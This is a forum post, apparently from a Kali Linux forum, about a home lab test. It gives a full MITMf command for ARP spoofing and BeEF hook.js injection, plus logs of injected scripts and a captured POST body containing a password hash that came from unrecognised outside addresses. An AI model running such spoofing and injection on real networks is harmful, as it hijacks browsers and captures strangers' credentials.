Results 1 to 1 of 1

Thread: Threat when running MITMf with JS hook injection ?

  1. #1
    Join Date
    2015-Dec
    Posts
    1

    Threat when running MITMf with JS hook injection ?

    Hello,

    I am running Kali 2.0 on a VM and I made a small lab in my LAN with a laptop running Windows 7 x64, a MacBook Pro running OSX 10.10, an iPad and an iPhone both running iOS 9.2.
    My LAN subnet is 192.168.178.0/24

    I want to see the behavior of the browsers in the OS from my lab, so I injected a JS hook with MITMf and I use BeEF to explore the possibilities of each one.

    Code:
    (MITMf)root@kali-2:~/MITMf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.178.1 --target 192.168.178.27-30 --inject --js-url http://192.168.178.23:3000/hook.js
    I am targeting the range 192.168.178.27-30 which corresponds to the devices in my lab, and 192.168.178.23 is Kali.
    When I browse on Internet with my devices, I can see my broswers in BeEF when they are hooked.

    I checked MITMf logs and here is my question.
    I can see all the logs about the targeted devices (here my iPad):

    Code:
    2015-12-21 02:13:47 192.168.178.30 [type:Other-Other os:Other] conn.skype.com
    2015-12-21 02:13:47 192.168.178.30 [type:Other-Other os:Other] [Inject] Injected JS script: conn.skype.com
    2015-12-21 02:15:44 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] translate.google.fr
    2015-12-21 02:15:44 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] [Inject] Injected JS script: translate.google.com
    2015-12-21 02:16:04 192.168.178.30 [type:Chrome Mobile iOS-47 os:iOS] www.googleadservices.com
    2015-12-21 02:27:30 192.168.178.30 [type:Mobile Safari-8 os:iOS] [Inject] Injected JS script: www.google.com
    2015-12-21 02:27:30 192.168.178.30 [type:Mobile Safari-8 os:iOS] www.google.com
    2015-12-21 02:27:31 192.168.178.30 [type:Mobile Safari-8 os:iOS] [Inject] Injected JS script: www.google.com
    2015-12-21 02:27:31 192.168.178.30 [type:Mobile Safari-8 os:iOS] www.google.com

    But after a while I start seeing logs about other machines out of my LAN:

    Code:
    2015-12-21 02:27:56 115.239.228.10 [type:IE-9 os:Windows 7] zc.qq.com
    2015-12-21 02:27:56 115.239.228.10 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com
    2015-12-21 02:28:12 115.239.228.3 [type:IE-9 os:Windows 7] zc.qq.com
    2015-12-21 02:28:12 115.239.228.10 [type:IE-9 os:Windows 7] zc.qq.com
    2015-12-21 02:28:12 115.239.228.3 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com
    2015-12-21 02:28:12 115.239.228.10 [type:IE-9 os:Windows 7] [Inject] Injected JS script: zc.qq.com
    2015-12-21 02:28:52 115.239.228.3 [type:Iron-21 os:Windows 8] zc.qq.com
    2015-12-21 02:32:28 115.239.228.3 [type:Iron-21 os:Windows 8] POST Data (zc.qq.com):
    verifycode=EEQA&country=1&province=63&city=9&isnongli=0&year=1991&month=12&day=2&isrunyue=0&password=a1b2279b359890bb0c8baeabf3ad71a29186f3b3cde5e9e861968b2674952cd43fbcd28f4f403bb6558fbae152b446a44dbf16af423e063d6d21af747865abe54021b2c2c612b0e0d3d97fb259a99717d95914d4877f9e4345775ae69d79ca5d6ddc13f6a643ec058542eeb84ec12b9f9c91d20c2f61ded8eafad517e0f0dacf&nick=%E5%B0%B3&email=false&other_email=false&elevel=1&***=1&qzdate=&jumpfrom=58030&telphone=&csloginstatus=1&d9c2=i6g0
    2015-12-21 02:32:37 115.239.228.3 [type:Iron-21 os:Windows 8] a.zc.qq.com
    IP's 115.239.228.X seems to belong to a China organization and I have never been on the website "zc.qq.com"
    Does it mean this machine is attacking me ?
    How can I avoid this ?

    Thank you for your answers

    Manu
    Last edited by manusky; 2015-12-21 at 13:05.

Similar Threads

  1. BeEF how to hook
    By w0lverine00x90 in forum General Archive
    Replies: 1
    Last Post: 2015-12-04, 10:45
  2. How do I hook up a midi keyboard to kali?
    By beast911 in forum General Archive
    Replies: 0
    Last Post: 2015-08-15, 05:01

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •